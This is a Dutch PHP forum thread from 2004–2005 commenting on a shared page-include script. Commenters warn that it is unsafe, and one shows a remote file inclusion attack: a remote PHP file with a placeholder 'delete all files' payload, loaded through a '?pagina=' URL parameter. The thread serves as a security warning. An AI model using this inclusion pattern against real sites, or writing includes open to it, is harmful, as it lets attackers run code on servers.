login  Naam:   Wachtwoord: 
Registreer je!
Scripts > PHP > Handige scripts > Pagina sript + Extentie


Reacties op het script Pagina sript + Extentie

Offline  Joel
Gepost op: 31 augustus 2004 - 18:33
Eigenaar



Variabelen buiten haakjes. Ik vind de stijl hoe je code ook niet zo mooi, misschien spaties of tabs gebruiken ?

Offline  Tuinstoel
Gepost op: 01 september 2004 - 14:05
PHP expert



En een correcte titel:o

Offline  Thomas
Gepost op: 20 oktober 2004 - 08:37
Moderator



Is dit wel veilig ?

Je kan op deze manier een extern .txt-bestand includen die php-code bevat, met mogelijk desastreuze gevolgen (unlink? een DROP-query?)

Offline  Toppe
Gepost op: 24 december 2004 - 08:49
PHP interesse



Citaat:
[I][B]FangorN[/B] schreef op 20 Oktober 2004 - 08:37[/I]

Is dit wel veilig ?

Je kan op deze manier een extern .txt-bestand includen die php-code bevat, met mogelijk desastreuze gevolgen (unlink? een DROP-query?)


Dan moet je de extentie .txt niet in de array zetten. Een goeie PHP'r op msn zegt dat hij veilig is:O

Offline  Fenrir
Gepost op: 10 februari 2005 - 17:44
PHP expert



de extentie maakt toch niet uit?
je kunt met dit script remote php uitvoeren, en dat is onveilig.

vb:

// www.site.com/remotephp.php
php code - Bekijk de code zonder highlighting - Klap code in 
  1. \
  2. <?php
  3. echo '<?php # verwijder alle bestanden van je server oid # ?>';
  4. ?>


en dan roep je het aan via deze url:
www.jesite.nl/?pagina=www.site.com/remotephp.php


Enkel aanvullende informatie, vragen en antwoorden op vragen zijn welkom.
 
© 2002-2024 Sitemasters.be - Regels - Laadtijd: 0.027s